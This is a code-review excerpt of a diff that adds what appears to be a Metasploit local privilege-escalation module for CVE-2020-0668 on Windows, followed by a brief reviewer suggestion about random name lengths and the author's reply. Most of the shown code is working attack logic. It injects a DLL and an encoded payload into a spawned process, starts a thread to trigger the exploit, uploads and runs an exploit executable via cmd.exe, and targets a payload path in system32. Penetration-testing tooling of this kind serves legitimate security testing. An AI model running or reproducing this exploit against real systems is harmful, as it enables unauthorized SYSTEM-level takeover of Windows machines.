modules/exploits/windows/local/cve_2020_0668_service_tracing.rb

```diff
@@ -0,0 +1,388 @@
+    dll = ''
+    ::File.open(library_path, 'rb') { |f| dll = f.read }
+
+    exploit_mem, offset = inject_dll_data_into_process(process, dll)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status('Payload injected. Executing exploit...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+  end
+
+  def launch_dll_trigger
+    begin
+      print_status('Checking target...')
+      validate_active_host
+      validate_target
+      print_status('Target Looks Good... trying to start notepad')
+      process = setup_process
+      inject_magic(process)
+      print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error(e.message)
+    end
+  end
+
+  def launch_exe_trigger(upload_filename)
+    # Upload Exploit
+    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{upload_filename}")
+#    exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
+    exploit_bin = exploit_data('netman_dll_hijack', 'netman_dll_hijack.exe')
+    write_file(upload_filename, exploit_bin)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{upload_filename}")
+    begin
+      cmd_exec('cmd.exe', "/c #{upload_filename}", 60)
+    rescue Rex::TimeoutError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error("Caught timeout.  Exploit may be taking longer or it may have failed.")
+    end
+    vprint_status("Cleaning up #{upload_filename}")
+    ensure_clean_destination(upload_filename)
+
+  end
+  def exploit
+    # Make directories
+    if datastore['EXPLOIT_DIR'].nil?
+      @exploit_dir = session.sys.config.getenv('TEMP') + "\\" + Rex::Text.rand_text_alpha((rand(8) + 6))
+    else
+      @exploit_dir = datastore['EXPLOIT_DIR']
+    end
+    vprint_status("Making #{@exploit_dir} on #{sysinfo['Computer']}")
+    make_dir(@exploit_dir)
+    @mount_dir = '\\RPC Control\\'
+    vprint_status("Making #{@mount_dir} on #{sysinfo['Computer']}")
+
+    # get variables in order
+#    make_dir(@mount_dir)
+    payload_name = datastore['PAYLOAD_UPLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.dll'
+    upload_payload_pathname = "#{@exploit_dir}\\#{payload_name}"
+    win_dir = session.sys.config.getenv('windir')
+    target_payload_pathname = "#{win_dir}\\system32\\WindowsCoreDeviceInfo.dll"
+#    target_payload_pathname = "#{win_dir}\\system32\\WindowsCoreDeviceInfo.dll"
+    new_logfile_name = datastore['LOG_FILENAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.log'
+    old_logfile_name = datastore['LOG_FILENAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.log'
```

Comment:
```suggestion
    new_logfile_name = datastore['LOG_FILENAME'] || Rex::Text.rand_text_alpha(8..14) + '.log'
    old_logfile_name = datastore['LOG_FILENAME'] || Rex::Text.rand_text_alpha(8..14) + '.log'
```

Reply:
These variables were artifacts and never used.  Yeeted them into /dev/null.
Fixed